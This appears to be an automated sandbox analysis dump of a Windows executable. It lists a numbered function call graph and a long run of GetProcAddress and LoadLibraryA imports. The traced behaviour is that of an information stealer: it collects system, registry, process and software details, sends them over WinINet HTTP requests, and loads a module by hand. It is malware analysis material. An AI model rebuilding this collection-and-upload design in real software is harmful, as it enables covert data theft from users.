81142->81143 81144 413e2d 81143->81144 81145 40e9d0 lstrcpy 81144->81145 81146 413e3a 81145->81146 81147 40ea8b 4 API calls 81146->81147 81148 413e5a 81147->81148 81149 40e9d0 lstrcpy 81148->81149 81150 413e67 81149->81150 81151 40ea8b 4 API calls 81150->81151 81152 413e8a 81151->81152 81153 40e9d0 lstrcpy 81152->81153 81154 413e97 81153->81154 81476 40ec81 GetProcessHeap HeapAlloc GetTimeZoneInformation 81154->81476 81157 40ea8b 4 API calls 81158 413ebb 81157->81158 81159 40e9d0 lstrcpy 81158->81159 81160 413ec8 81159->81160 81161 40ea8b 4 API calls 81160->81161 81162 413eeb 81161->81162 81163 40e9d0 lstrcpy 81162->81163 81164 413ef8 81163->81164 81165 40ea8b 4 API calls 81164->81165 81166 413f1b 81165->81166 81167 40e9d0 lstrcpy 81166->81167 81168 413f28 81167->81168 81169 40ea8b 4 API calls 81168->81169 81170 413f4b 81169->81170 81171 40e9d0 lstrcpy 81170->81171 81172 413f58 81171->81172 81479 40ee07 GetProcessHeap HeapAlloc RegOpenKeyExA 81172->81479 81175 40ea8b 4 API calls 81176 413f7c 81175->81176 81177 40e9d0 lstrcpy 81176->81177 81178 413f89 81177->81178 81179 40ea8b 4 API calls 81178->81179 81180 413fac 81179->81180 81181 40e9d0 lstrcpy 81180->81181 81182 413fb9 81181->81182 81183 40ea8b 4 API calls 81182->81183 81184 413fd9 81183->81184 81185 40e9d0 lstrcpy 81184->81185 81186 413fe6 81185->81186 81482 40eea3 81186->81482 81189 40ea8b 4 API calls 81190 414004 81189->81190 81191 40e9d0 lstrcpy 81190->81191 81192 414011 81191->81192 81193 40ea8b 4 API calls 81192->81193 81194 414031 81193->81194 81195 40e9d0 lstrcpy 81194->81195 81196 41403e 81195->81196 81197 40ea8b 4 API calls 81196->81197 81198 41405e 81197->81198 81199 40e9d0 lstrcpy 81198->81199 81200 41406b 81199->81200 81497 40ee70 GetSystemInfo wsprintfA 81200->81497 81202 41407c 81203 40ea8b 4 API calls 81202->81203 81204 414089 81203->81204 81205 40e9d0 lstrcpy 81204->81205 81206 414096 81205->81206 81207 40ea8b 4 API calls 81206->81207 81208 4140b6 81207->81208 81209 40e9d0 lstrcpy 81208->81209 81210 4140c3 81209->81210 81211 40ea8b 4 API calls 81210->81211 81212 4140e3 81211->81212 81213 40e9d0 lstrcpy 81212->81213 81214 4140f0 81213->81214 81498 40ef70 GetProcessHeap HeapAlloc 81214->81498 81216 414101 81217 40ea8b 4 API calls 81216->81217 81218 41410e 81217->81218 81219 40e9d0 lstrcpy 81218->81219 81220 41411b 81219->81220 81221 40ea8b 4 API calls 81220->81221 81222 41413b 81221->81222 81223 40e9d0 lstrcpy 81222->81223 81224 414148 81223->81224 81225 40ea8b 4 API calls 81224->81225 81226 41416b 81225->81226 81227 40e9d0 lstrcpy 81226->81227 81228 414178 81227->81228 81229 40ea8b 4 API calls 81228->81229 81230 41419b 81229->81230 81231 40e9d0 lstrcpy 81230->81231 81232 4141a8 81231->81232 81503 40efd9 _EH_prolog 81232->81503 81235 40ea17 3 API calls 81236 4141d8 81235->81236 81237 40e9d0 lstrcpy 81236->81237 81238 4141e5 81237->81238 81239 40ea8b 4 API calls 81238->81239 81240 414217 81239->81240 81241 40e9d0 lstrcpy 81240->81241 81242 414224 81241->81242 81243 40ea8b 4 API calls 81242->81243 81244 414247 81243->81244 81245 40e9d0 lstrcpy 81244->81245 81246 414254 81245->81246 81510 40f310 _EH_prolog 81246->81510 81248 41426f 81249 40ea17 3 API calls 81248->81249 81250 414284 81249->81250 81251 40e9d0 lstrcpy 81250->81251 81252 414291 81251->81252 81253 40ea8b 4 API calls 81252->81253 81254 4142c3 81253->81254 81255 40e9d0 lstrcpy 81254->81255 81256 4142d0 81255->81256 81257 40ea8b 4 API calls 81256->81257 81258 4142f3 81257->81258 81259 40e9d0 lstrcpy 81258->81259 81260 414300 81259->81260 81518 40f0be _EH_prolog 81260->81518 81262 414320 81263 40ea17 3 API calls 81262->81263 81264 414336 81263->81264 81265 40e9d0 lstrcpy 81264->81265 81266 414343 81265->81266 81267 40f0be 15 API calls 81266->81267 81268 414372 81267->81268 81269 40ea17 3 API calls 81268->81269 81270 414388 81269->81270 81271 40e9d0 lstrcpy 81270->81271 81272 414395 81271->81272 81273 40ea8b 4 API calls 81272->81273 81274 4143c4 81273->81274 81275 40e9d0 lstrcpy 81274->81275 81276 4143d1 81275->81276 81277 4143e5 lstrlenA 81276->81277 81278 4143f5 81277->81278 81279 40e912 lstrcpy 81278->81279 81280 41440b 81279->81280 81281 4010b1 2 API calls 81280->81281 81282 414423 81281->81282 81534 413452 _EH_prolog 81282->81534 81284 414430 81285 401061 _EH_prolog 81284->81285 81286 414456 81285->81286 81286->79708 81288 40e949 lstrcpy 81287->81288 81289 4041ff 81288->81289 81290 403a76 6 API calls 81289->81290 81291 40420b GetProcessHeap RtlAllocateHeap 81290->81291 81806 40eb3c 81291->81806 81293 404245 InternetOpenA StrCmpCA 81294 404264 81293->81294 81295 40439a InternetCloseHandle 81294->81295 81296 40426f InternetConnectA 81294->81296 81303 40430b 81295->81303 81297 404391 InternetCloseHandle 81296->81297 81298 40428f HttpOpenRequestA 81296->81298 81297->81295 81299 4042c4 81298->81299 81300 40438a InternetCloseHandle 81298->81300 81301 4042c8 InternetSetOptionA 81299->81301 81302 4042de HttpSendRequestA HttpQueryInfoA 81299->81302 81300->81297 81301->81302 81302->81303 81305 40432e 81302->81305 81303->79713 81304 404348 InternetReadFile 81304->81300 81304->81305 81305->81300 81305->81303 81305->81304 81807 406127 81306->81807 81308 40dfc5 81309 4010b1 2 API calls 81308->81309 81310 40dfd6 81309->81310 82038 40d838 237 API calls 81310->82038 81312 40ddcd StrCmpCA 81338 40dda8 81312->81338 81313 40dfdb 81314 4010b1 2 API calls 81313->81314 81316 40dfe9 81314->81316 81315 40de42 StrCmpCA 81315->81338 82039 40ac6f 108 API calls 81316->82039 81318 40e912 lstrcpy 81318->81338 81319 40e1aa 81321 401061 _EH_prolog 81319->81321 81320 40df5e StrCmpCA 81320->81338 81322 40e1b6 81321->81322 81322->79717 81324 40ea17 3 API calls 81324->81338 81325 40e014 StrCmpCA 81341 40dfee 81325->81341 81326 40e949 lstrcpy 81326->81338 81327 40ea8b _EH_prolog lstrlenA lstrcpy lstrcat 81327->81338 81328 4010b1 _EH_prolog lstrcpy 81328->81341 81329 40e088 StrCmpCA 81329->81341 81330 40e9d0 lstrcpy 81330->81338 81331 40e912 lstrcpy 81331->81341 81333 40c481 192 API calls 81333->81341 81334 40ea17 3 API calls 81334->81341 81335 40ea8b _EH_prolog lstrlenA lstrcpy lstrcat 81335->81341 81336 4010b1 _EH_prolog lstrcpy 81336->81338 81337 40e9d0 lstrcpy 81337->81341 81338->81308 81338->81312 81338->81315 81338->81318 81338->81320 81338->81324 81338->81326 81338->81327 81338->81330 81338->81336 81810 40c481 _EH_prolog 81338->81810 81864 40c740 _EH_prolog 81338->81864 81977 40a9cd _EH_prolog 81338->81977 81340 40e949 lstrcpy 81340->81341 81341->81319 81341->81325 81341->81328 81341->81329 81341->81331 81341->81333 81341->81334 81341->81335 81341->81337 81341->81340 81342 40c740 193 API calls 81341->81342 81342->81341 81358 40e912 lstrcpy 81357->81358 81359 40214a 81358->81359 81359->80486 81361 401081 81360->81361 81361->80540 81362->80486 81363->80486 81364->80486 81365->80486 81366->80530 81367->80543 81368->80529 81369->80511 81370->80496 81371->80495 81372->80496 81373->80480 81374->80496 81376 40e912 lstrcpy 81375->81376 81377 402164 81376->81377 81377->80470 81378->80481 81379->80529 81381 40f50d 81380->81381 81382 40e912 lstrcpy 81381->81382 81383 40f51d 81382->81383 81383->80574 81384->80578 81386 403a8f 81385->81386 81386->81386 81387 403a96 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 81386->81387 81396 40eb3c 81387->81396 81389 403ad8 lstrlenA 81397 40eb3c 81389->81397 81391 403ae8 InternetCrackUrlA 81392 403b06 81391->81392 81392->80587 81393->80712 81395 40e984 81394->81395 81395->80637 81396->81389 81397->81391 81398->80721 81399->80902 81400->80904 81401->80906 81402->80908 81403->80912 81404->80914 81406 4062b8 LocalAlloc 81405->81406 81407 405945 81405->81407 81406->81407 81408 4062c8 CryptStringToBinaryA 81406->81408 81407->80765 81407->80775 81408->81407 81409 4062df LocalFree 81408->81409 81409->81407 81410->80922 81411->80930 81413 40e912 lstrcpy 81412->81413 81414 4020fc 81413->81414 81414->80948 81415->80965 81417 40f4c9 CharToOemA 81416->81417 81418 40f4ae RegQueryValueExA 81416->81418 81417->80979 81418->81417 81421 410010 K32GetModuleFileNameExA CloseHandle 81420->81421 81422 41002c 81420->81422 81421->81422 81423 40e912 lstrcpy 81422->81423 81424 41003b 81423->81424 81424->81023 81553 40ebac 81425->81553 81428 40f6cb RegOpenKeyExA 81429 40f6c4 81428->81429 81430 40f6eb RegQueryValueExA 81428->81430 81429->81045 81430->81429 81432 40f80c 81431->81432 81433 40f814 CoSetProxyBlanket 81432->81433 81434 40f910 81432->81434 81436 40f844 81433->81436 81435 40e912 lstrcpy 81434->81435 81437 40f924 81435->81437 81436->81434 81438 40f84c 81436->81438 81437->81059 81438->81437 81439 40f878 VariantInit 81438->81439 81440 40f89a 81439->81440 81559 40f711 CoCreateInstance 81440->81559 81442 40f8a8 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 81443 40e912 lstrcpy 81442->81443 81444 40f904 VariantClear 81443->81444 81444->81437 81446 40f995 81445->81446 81447 40f99d CoSetProxyBlanket 81446->81447 81451 40fa35 81446->81451 81448 40f9cd 81447->81448 81450 40f9d1 81448->81450 81448->81451 81449 40e912 lstrcpy 81452 40fa49 81449->81452 81450->81452 81453 40f9f5 VariantInit 81450->81453 81451->81449 81452->81073 81454 40fa17 81453->81454 81565 40fc78 LocalAlloc CharToOemW 81454->81565 81456 40fa1f 81457 40e912 lstrcpy 81456->81457 81458 40fa29 VariantClear 81457->81458 81458->81452 81460 40ec22 81459->81460 81460->81087 81461->81100 81463 40e912 lstrcpy 81462->81463 81464 40f45a 81463->81464 81464->81115 81466 40e912 lstrcpy 81465->81466 81467 40ecfc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 81466->81467 81468 40ede7 81467->81468 81473 40ed37 81467->81473 81469 40edf8 81468->81469 81470 40edef LocalFree 81468->81470 81469->81129 81470->81469 81471 40ed3c GetLocaleInfoA 81471->81473 81472 40ea8b _EH_prolog lstrlenA lstrcpy lstrcat 81472->81473 81473->81468 81473->81471 81473->81472 81474 40e9d0 lstrcpy 81473->81474 81474->81473 81475->81142 81477 40ecb3 wsprintfA 81476->81477 81478 40eccf 81476->81478 81477->81478 81478->81157 81480 40ee62 81479->81480 81481 40ee4a RegQueryValueExA 81479->81481 81480->81175 81481->81480 81483 40eef5 GetLogicalProcessorInformationEx 81482->81483 81484 40ef00 81483->81484 81485 40eecb GetLastError 81483->81485 81568 40fac9 GetProcessHeap HeapFree 81484->81568 81486 40ef54 81485->81486 81487 40eed6 81485->81487 81489 40ef5e 81486->81489 81569 40fac9 GetProcessHeap HeapFree 81486->81569 81495 40eeda 81487->81495 81489->81189 81492 40ef27 81492->81489 81494 40ef2d wsprintfA 81492->81494 81494->81489 81495->81483 81496 40ef4d 81495->81496 81566 40fac9 GetProcessHeap HeapFree 81495->81566 81567 40fae6 GetProcessHeap HeapAlloc 81495->81567 81496->81489 81497->81202 81570 40fa92 81498->81570 81501 40efb0 wsprintfA 81501->81216 81504 40e912 lstrcpy 81503->81504 81508 40f000 81504->81508 81505 40f094 EnumDisplayDevicesA 81506 40f0ad 81505->81506 81505->81508 81506->81235 81507 40ea8b _EH_prolog lstrlenA lstrcpy lstrcat 81507->81508 81508->81505 81508->81506 81508->81507 81509 40e9d0 lstrcpy 81508->81509 81509->81508 81511 40e912 lstrcpy 81510->81511 81512 40f33a CreateToolhelp32Snapshot Process32First 81511->81512 81513 40f3d3 CloseHandle 81512->81513 81517 40f36b 81512->81517 81513->81248 81514 40f3bf Process32Next 81514->81513 81514->81517 81515 40ea8b _EH_prolog lstrlenA lstrcpy lstrcat 81515->81517 81516 40e9d0 lstrcpy 81516->81517 81517->81514 81517->81515 81517->81516 81519 40e912 lstrcpy 81518->81519 81520 40f0e2 RegOpenKeyExA 81519->81520 81521 40f134 81520->81521 81522 40f115 81520->81522 81523 40f13d RegEnumKeyExA 81521->81523 81529 40f2d0 81521->81529 81530 40ea8b _EH_prolog lstrlenA lstrcpy lstrcat 81521->81530 81532 40f23f RegQueryValueExA 81521->81532 81533 40e9d0 lstrcpy 81521->81533 81524 40e949 lstrcpy 81522->81524 81523->81521 81525 40f166 wsprintfA RegOpenKeyExA 81523->81525 81528 40f121 81524->81528 81526 40f1aa RegQueryValueExA 81525->81526 81525->81529 81526->81521 81527 40f1d4 lstrlenA 81526->81527 81527->81521 81528->81262 81531 40e949 lstrcpy 81529->81531 81530->81521 81531->81528 81532->81521 81533->81521 81572 412387 _EH_prolog 81534->81572 81536 413475 81537 40e9d0 lstrcpy 81536->81537 81538 413497 81537->81538 81539 40e9d0 lstrcpy 81538->81539 81540 4134bb 81539->81540 81541 40e9d0 lstrcpy 81540->81541 81542 4134c7 81541->81542 81543 40e9d0 lstrcpy 81542->81543 81544 4134d3 81543->81544 81545 4134da Sleep 81544->81545 81546 4134ea CreateThread WaitForSingleObject 81544->81546 81545->81544 81547 40e912 lstrcpy 81546->81547 81576 41224d _EH_prolog 81546->81576 81548 413518 81547->81548 81574 4123d3 _EH_prolog 81548->81574 81550 41352b 81551 401061 _EH_prolog 81550->81551 81552 413537 81551->81552 81552->81284 81556 40eb3f GetProcessHeap HeapAlloc RegOpenKeyExA 81553->81556 81555 40ebb1 81555->81428 81555->81429 81557 40eb82 RegQueryValueExA 81556->81557 81558 40eb99 81556->81558 81557->81558 81558->81555 81560 40f79c 81559->81560 81561 40f73b SysAllocString 81559->81561 81560->81442 81561->81560 81563 40f74b 81561->81563 81562 40f798 SysFreeString 81562->81560 81563->81562 81564 40f77e _wtoi64 SysFreeString 81563->81564 81564->81562 81565->81456 81566->81495 81567->81495 81568->81492 81569->81489 81571 40ef9a GlobalMemoryStatusEx 81570->81571 81571->81501 81573 4123a0 81572->81573 81573->81536 81575 4123f3 81574->81575 81575->81550 81585 40eb3c 81576->81585 81578 41226e lstrlenA 81579 41227a 81578->81579 81583 412285 81578->81583 81580 40e949 lstrcpy 81580->81583 81582 40e9d0 lstrcpy 81582->81583 81583->81580 81583->81582 81584 41232d StrCmpCA 81583->81584 81586 4043cf _EH_prolog 81583->81586 81584->81579 81584->81583 81585->81578 81587 40e949 lstrcpy 81586->81587 81588 4043ff 81587->81588 81589 403a76 6 API calls 81588->81589 81590 40440b 81589->81590 81793 40fd97 81590->81793 81592 404437 81593 404442 lstrlenA 81592->81593 81594 404452 81593->81594 81595 40fd97 4 API calls 81594->81595 81596 404460 81595->81596 81597 40e912 lstrcpy 81596->81597 81598 404470 81597->81598 81599 40e912 lstrcpy 81598->81599 81600 404481 81599->81600 81601 40e912 lstrcpy 81600->81601 81602 404492 81601->81602 81603 40e912 lstrcpy 81602->81603 81604 4044a3 81603->81604 81605 40e912 lstrcpy 81604->81605 81606 4044b4 StrCmpCA 81605->81606 81608 4044d0 81606->81608 81607 4044f6 81609 40fb47 3 API calls 81607->81609 81608->81607 81610 4044e5 InternetOpenA 81608->81610 81611 404501 81609->81611 81610->81607 81621 404d29 81610->81621 81612 40ea17 3 API calls 81611->81612 81613 404517 81612->81613 81614 40e9d0 lstrcpy 81613->81614 81615 404524 81614->81615 81616 40ea8b 4 API calls 81615->81616 81617 404550 81616->81617 81618 40ea17 3 API calls 81617->81618 81619 404566 81618->81619 81620 40ea8b 4 API calls 81619->81620 81622 40457a 81620->81622 81623 40e949 lstrcpy 81621->81623 81624 40e9d0 lstrcpy 81622->81624 81632 404c85 81623->81632 81625 404587 81624->81625 81626 40ea8b 4 API calls 81625->81626 81627 4045c0 81626->81627 81628 40ea17 3 API calls 81627->81628 81629 4045d3 81628->81629 81630 40e9d0 lstrcpy 81629->81630 81631 4045e0 81630->81631 81633 4045f8 InternetConnectA 81631->81633 81632->81583 81633->81621 81634 40461c HttpOpenRequestA 81633->81634 81635 404d20 InternetCloseHandle 81634->81635 81635->81621 81794 40fda8 CryptBinaryToStringA 81793->81794 81796 40fda4 81793->81796 81795 40fdc5 GetProcessHeap HeapAlloc 81794->81795 81794->81796 81795->81796 81797 40fde2 CryptBinaryToStringA 81795->81797 81796->81592 81797->81796 81806->81293 82040 4060f0 81807->82040 81809 406136 81809->81338 81811 40e912 lstrcpy 81810->81811 81812 40c4a5 81811->81812 82093 40fd0c SHGetFolderPathA 81812->82093 81815 40ea17 3 API calls 81816 40c4cf 81815->81816 81817 40e9d0 lstrcpy 81816->81817 81818 40c4dc 81817->81818 81819 40ea17 3 API calls 81818->81819 81820 40c504 81819->81820 81821 40e9d0 lstrcpy 81820->81821 81865 40e912 lstrcpy 81864->81865 81866 40c764 81865->81866 81867 40e912 lstrcpy 81866->81867 81868 40c775 81867->81868 81869 40c78e StrCmpCA 81868->81869 81870 40ca1c 81869->81870 81871 40c79f 81869->81871 81872 40fd0c 2 API calls 81870->81872 81873 40fd0c 2 API calls 81871->81873 81874 40ca25 81872->81874 81875 40c7a8 81873->81875 81876 40ea17 3 API calls 81874->81876 81877 40ea17 3 API calls 81875->81877 81878 40ca38 81876->81878 81879 40c7bb 81877->81879 81880 40e9d0 lstrcpy 81878->81880 81881 40e9d0 lstrcpy 81879->81881 81882 40ca45 81880->81882 81883 40c7c8 81881->81883 81978 40e912 lstrcpy 81977->81978 81979 40a9ee 81978->81979 81980 40e912 lstrcpy 81979->81980 81981 40a9ff 81980->81981 81982 40fd0c 2 API calls 81981->81982 81983 40aa0e 81982->81983 81984 40ea17 3 API calls 81983->81984 81985 40aa21 81984->81985 81986 40e9d0 lstrcpy 81985->81986 81987 40aa2e 81986->81987 81988 40ea17 3 API calls 81987->81988 81989 40aa56 81988->81989 82038->81313 82039->81341 82041 4060fb 82040->82041 82044 405fbc 82041->82044 82043 40610c 82043->81809 82047 405e55 82044->82047 82048 405e6e 82047->82048 82062 405e66 82047->82062 82063 4059ec 82048->82063 82052 405ea1 82052->82062 82075 405c7a 82052->82075 82057 405f1b 82057->82062 82089 40fac9 GetProcessHeap HeapFree 82057->82089 82058 405f5c FreeLibrary 82058->82058 82059 405f6e 82058->82059 82088 40fac9 GetProcessHeap HeapFree 82059->82088 82062->82043 82065 4059fb 82063->82065 82064 405a02 82064->82062 82069 405a9f 82064->82069 82065->82064 82066 405a52 82065->82066 82090 40fae6 GetProcessHeap HeapAlloc 82066->82090 82068 405a61 82068->82064 82070 405ae7 VirtualAlloc 82069->82070 82071 405abe 82069->82071 82072 405b17 82070->82072 82073 405b1d 82070->82073 82071->82070 82072->82073 82074 405b22 VirtualAlloc 82072->82074 82073->82052 82074->82073 82076 405da2 82075->82076 82077 405c94 82075->82077 82076->82062 82084 405db5 82076->82084 82077->82076 82078 405cae LoadLibraryA 82077->82078 82079 405da8 82078->82079 82082 405cc8 82078->82082 82079->82076 82081 405d74 GetProcAddress 82081->82079 82081->82082 82082->82077 82082->82079 82082->82081 82091 40fae6 GetProcessHeap HeapAlloc 82082->82091 82092 40fac9 GetProcessHeap HeapFree 82082->82092 82086 405e4a 82084->82086 82087 405dcb 82084->82087 82085 405e20 VirtualProtect 82085->82086 82085->82087 82086->82057 82086->82058 82086->82059 82086->82062 82087->82085 82087->82086 82088->82057 82089->82062 82090->82068 82091->82082 82092->82082 82094 40e912 lstrcpy 82093->82094 82095 40c4bc 82094->82095 82095->81815 82642 1b49fd40 82644 1b49fd67 82642->82644 82643 1b49fdf4 ReadFile 82643->82644 82645 1b49fd83 82643->82645 82644->82643 82644->82645 82646 1b4a7d30 82647 1b4a7d43 82646->82647 82649 1b4a7d49 82646->82649 82650 1b628d80 82647->82650 82652 1b628d8f 82650->82652 82651 1b628e6f 82651->82649 82652->82651 82654 1b4a4cf0 82652->82654 82656 1b4a4d30 82654->82656 82655 1b4a4ed5 CreateFileW 82655->82656 82656->82655 82657 1b4a506d 82656->82657 82657->82651

                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                Function 00416676 Relevance: 207.0, APIs: 114, Strings: 4, Instructions: 490libraryloaderCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetProcAddress.KERNEL32(74DD0000,00415AF4), ref: 0041668A
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 004166A1
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 004166B8
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 004166CF
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 004166E6
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 004166FD
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416714
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 0041672B
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416742
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416759
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416770
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416787
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 0041679E
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 004167B5
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 004167CC
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 004167E3
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 004167FA
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416811
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416828
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 0041683F
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416856
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 0041686D
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416884
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 0041689B
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 004168B2
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 004168C9
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 004168E0
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 004168F7
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 0041690E
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416925
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 0041693C
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416953
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 0041696A
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416981
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416998
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 004169AF
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 004169C6
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 004169DD
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 004169F4
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416A0B
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416A22
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416A39
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416A50
                                                                                                                                                                                                • LoadLibraryA.KERNEL32(00415AF4,?,00000040,00000064,00412598,00411C31,?,0000002C,00000064,00412517,00412554,?,00000024,00000064,Function_000121C3,004124D3), ref: 00416A61
                                                                                                                                                                                                • LoadLibraryA.KERNEL32 ref: 00416A72
                                                                                                                                                                                                • LoadLibraryA.KERNEL32 ref: 00416A83
                                                                                                                                                                                                • LoadLibraryA.KERNEL32 ref: 00416A94
                                                                                                                                                                                                • LoadLibraryA.KERNEL32 ref: 00416AA5
                                                                                                                                                                                                • LoadLibraryA.KERNEL32 ref: 00416AB6
                                                                                                                                                                                                • LoadLibraryA.KERNEL32 ref: 00416AC7
                                                                                                                                                                                                • LoadLibraryA.KERNEL32 ref: 00416AD8
                                                                                                                                                                                                • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00416AE8
                                                                                                                                                                                                • GetProcAddress.KERNEL32(75290000), ref: 00416B03
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416B1A
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416B31
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416B48
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416B5F
                                                                                                                                                                                                • GetProcAddress.KERNEL32(6FD40000), ref: 00416B7E
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416B95
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416BAC
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416BC3
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416BDA
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416BF1
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416C08
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416C1F
                                                                                                                                                                                                • GetProcAddress.KERNEL32(752C0000), ref: 00416C3A
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416C51
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416C68
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416C7F
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416C96
                                                                                                                                                                                                • GetProcAddress.KERNEL32(74EC0000), ref: 00416CB5
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416CCC
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416CE3
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416CFA
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416D11
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416D28
                                                                                                                                                                                                • GetProcAddress.KERNEL32(75BD0000), ref: 00416D47
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416D5E
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416D75
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416D8C
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416DA3
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416DBA
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416DD1
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416DE8
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416DFF
                                                                                                                                                                                                • GetProcAddress.KERNEL32(75A70000), ref: 00416E1A
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416E31
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416E48
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416E5F
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416E76
                                                                                                                                                                                                • GetProcAddress.KERNEL32(75450000), ref: 00416E91
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416EA8
                                                                                                                                                                                                • GetProcAddress.KERNEL32(75DA0000), ref: 00416EC3
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416EDA
                                                                                                                                                                                                • GetProcAddress.KERNEL32(6F090000), ref: 00416EF9
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416F10
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416F27
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416F3E
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416F55
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416F6C
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416F83
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416F9A
                                                                                                                                                                                                • GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00416FB0
                                                                                                                                                                                                • GetProcAddress.KERNEL32(InternetSetOptionA), ref: 00416FC6
                                                                                                                                                                                                • GetProcAddress.KERNEL32(75AF0000), ref: 00416FE1
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416FF8
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 0041700F
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00417026
                                                                                                                                                                                                • GetProcAddress.KERNEL32(75D90000), ref: 00417041
                                                                                                                                                                                                • GetProcAddress.KERNEL32(6CB60000), ref: 0041705C
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00417073
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 0041708A
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 004170A1
                                                                                                                                                                                                • GetProcAddress.KERNEL32(6C970000,SymMatchString), ref: 004170BB
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
